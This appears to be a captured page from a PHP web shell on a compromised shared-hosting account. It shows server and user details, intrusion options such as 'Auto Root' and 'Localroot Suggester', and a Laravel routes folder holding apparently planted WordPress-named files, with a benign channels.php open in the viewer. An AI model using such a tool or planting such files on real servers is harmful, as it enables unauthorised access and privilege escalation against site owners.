Linux business57.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
Server IP : 199.188.201.191 & Your IP : 3.17.156.98
Domains :
Cant Read [ /etc/named.conf ]
User : derozboy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
derozboy /
velxotano-group.pro /
routes /
Delete
Unzip
Name
Size
Permission
Date
Action
AddressEncoder
[ DIR ]
drwxr-xr-x
2025-04-25 05:12
Signers
[ DIR ]
drwxr-xr-x
2025-04-26 03:36
.htaccess
237
B
-r-xr-xr-x
2025-04-26 03:36
api.php
566
B
-rw-r--r--
2020-06-30 11:49
channels.php
551
B
-rw-r--r--
2020-06-30 11:49
console.php
593
B
-rw-r--r--
2020-06-30 11:49
error_log
1.54
KB
-rw-r--r--
2025-04-23 21:32
web.php
24.31
KB
-rw-r--r--
2022-06-01 21:22
wp-blog-header.php
2.73
KB
-r--r--r--
2025-04-22 01:18
wp-cron.php
2.73
KB
-rw-r--r--
2025-04-22 01:18
Save
Rename
<?php use Illuminate\Support\Facades\Broadcast; /* |-------------------------------------------------------------------------- | Broadcast Channels |-------------------------------------------------------------------------- | | Here you may register all of the event broadcasting channels that your | application supports. The given channel authorization callbacks are | used to check if an authenticated user can listen to the channel. | */ Broadcast::channel('App.User.{id}', function ($user, $id) { return (int) $user->id === (int) $id; });